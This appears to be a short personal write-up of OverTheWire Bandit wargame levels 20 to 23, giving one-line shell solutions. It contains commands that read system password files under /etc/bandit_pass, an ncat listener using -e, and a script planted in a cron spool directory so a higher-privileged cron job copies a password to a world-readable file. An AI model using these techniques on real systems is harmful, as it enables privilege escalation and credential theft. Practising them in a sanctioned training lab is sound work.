2025年04月01日
overthewire
level 20
you need to create a tcp server connection that send a password. that password must be equal to bandit20’s password
oh i accidentally found someone’s solution on the server: ncat -e /bin/echo <bandit20 password> -k -l 10235
he should’ve used /bin/cat /etc/bandit_pass/bandit20.
but i like this solution more since it doesn’t depend on nmap:
ssh -t bandit20@bandit.labs.overthewire.org -p 2220 "nc -lp 6969 < /etc/bandit_pass/bandit20 & ./suconnect 6969 | grep -E '^[A-Za-z0-9]{32}\$'"-I had to use ^ and $ since i only want the line with the password
level 21
i am using fish shell, i like to do it like this.
i have my passwords saved on a file as well, but i won’t be making it public.
the goal is to read the script of a cronjob and find the flag in a temp directory.
the path of the flag is hardcoded.
export LEVEL=21; ssh -t bandit$LEVEL@bandit.labs.overthewire.org -p 2220 "awk '/* bandit22/ {print \$7}' /etc/cron.d/cronjob_bandit22 | xargs awk '/cat/ {print \$4}' | xargs cat | grep -Eo '[A-Za-z0-9]{32}'"level 22
this level is the same as level 22 except it’s using weak form of obscurity by using md5 hash on a sentence.
export LEVEL=22; cat level(math $LEVEL - 1); ssh -t bandit$LEVEL@bandit.labs.overthewire.org -p 2220 "cat /tmp/\$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)"level 23
i stole someone’s terminal commands lmao
stty raw -ctlecho -echo; cd /home/bandit23 >/dev/null 2>&1; if [ $(date +%S) -lt 3 ]; then sleep 2; fi; s=$(mktemp --tmpdir=/var/spool/bandit24/foo); t=$(mktemp); b='!'; chmod 777 $t; echo -e "#$b/bin/sh\ncat /etc/bandit_pass/bandit24 > $t" > $s; chmod 777 $s; sleep 60; cat $t; rm -f $tjust to make my automation script work.
although using netcat already works as is, but with python’s paramiko, it’s 50/50
here’s the modified stolen commands:
export LEVEL=23; cat level(math $LEVEL - 1); ssh -t bandit$LEVEL@bandit.labs.overthewire.org -p 2220 's=$(mktemp --tmpdir=/var/spool/bandit24/foo); t=$(mktemp); chmod 777 $t; echo -e "cat /etc/bandit_pass/bandit24 > $t" > $s; chmod 777 $s; while [[ ! -s "$t" ]]; do sleep 1; done; cat $t | grep -Eo \'[A-Za-z0-9]{32}\''mktemp --tmpdir is needed to set the proper permissions otherwise using chmod will just cause an error.
i used a while loop so that there won’t be a reason to wait 60s